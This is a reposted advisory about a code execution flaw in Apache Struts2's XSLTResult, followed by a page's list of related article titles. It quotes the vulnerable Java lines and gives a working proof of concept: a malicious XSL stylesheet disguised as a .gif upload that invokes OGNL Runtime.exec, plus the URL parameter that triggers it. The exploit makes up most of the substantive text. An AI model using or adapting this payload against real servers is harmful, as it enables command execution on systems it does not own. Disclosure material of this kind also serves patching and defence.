struts2 xsltResult Local code execution vulnerability
来源:互联网 发布:淘宝发的红包怎么领取 编辑:程序博客网 时间:2024/05/17 09:06
the file:
http://svn.apache.org/repos/asf/struts/struts2/trunk/core/src/main/java/org/apache/struts2/views/xslt/XSLTResult.java
String pathFromRequest = ServletActionContext.getRequest().getParameter("xslt.location");
path = pathFromRequest;
URL resource = ServletActionContext.getServletContext().getResource(path);
templates = factory.newTemplates(new StreamSource(resource.openStream()));
A use of the action of xsltResult:
<action name="xslt" class="net.inbreak.xsltAction">
<result type="xslt"/>
</action>
An attacker can upload a file:
/upload/7758521.gif
<?xml version="1.0" encoding="UTF-8" ?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform";
version="1.0" xmlns:ognl="ognl.Ognl">
<xsl:template match="/">
<html>
<body>
<h2>hacked by kxlzx</h2>
<h2>http://www.inbreak.net</h2>
<exp>
<xsl:value-of select="ognl:getValue('@Runtime () getRuntime().exec("calc")', '')"/>
</exp>
</body>
</html>
</xsl:template>
</xsl:stylesheet>
open url
http://www.inbreak.net/xslt.action?xslt.location=upload/7758521.gif
then struts2 will execute
ognl:getValue('@Runtime () getRuntime().exec("calc")', '')
- struts2 xsltResult Local code execution vulnerability
- Vulnerability in Graphics Rendering Engine Allows Remote Code Execution
- Microsoft Windows SMB2 '_Smb2ValidateProviderCallback()' Remote Code Execution Vulnerability
- JDownloader support suffer from a code execution vulnerability.
- Citrix Provisioning Services 'streamprocess.exe' Component Remote Code Execution Vulnerability
- SAP Netweaver 'SAPHostControl' Service Remote Code Execution Vulnerability
- Struts2 的XSLTResult输出问题
- Struts2/XWork < 2.2.0 Remote Command Execution Vulnerability
- SAP MaxDB versions 7.6.03 suffer from a pre-authentication remote code execution vulnerability.
- TinyMCE Ajax File Manager suffers from a remote code execution vulnerability.
- CVE-2014-6283: Privilege Escalation Vulnerability and Potential Remote Code Execution in SAP Adaptiv
- Microsoft PowerPoint 2003 SP2 Local Code Execution Exploit
- TWiki SEARCH Variable Remote Command Execution Vulnerability
- xterm DECRQSS Remote Command Execution Vulnerability
- ZABBIX 'node_process_command()' Remote Command Execution Vulnerability
- LFI2RCE (Local File Inclusion to Remote Code Execution) advanced exploitation: /proc shortcuts
- Debian 'login' Local Privilege Escalation Vulnerability
- Linux Kernel 'fasync_helper()' Local Privilege Escalation Vulnerability
- 动态显示和隐藏软键盘
- YUI3学习(一)---入门
- 用 Hadoop 进行分布式并行编程, 第 1 部分
- Ubuntu 11.04 安装后要做的20件事(转)
- 立即更新文件缓存区的函数
- struts2 xsltResult Local code execution vulnerability
- android 网络管理
- Android自定义View以及layout属性全攻略
- dll导出类的实现
- Android 的 SurfaceView 双缓冲应用
- nodejs中net包的使用
- android自定义Toast视图
- mouseover事件与mouseenter事件的区别
- iphone开发资源汇总
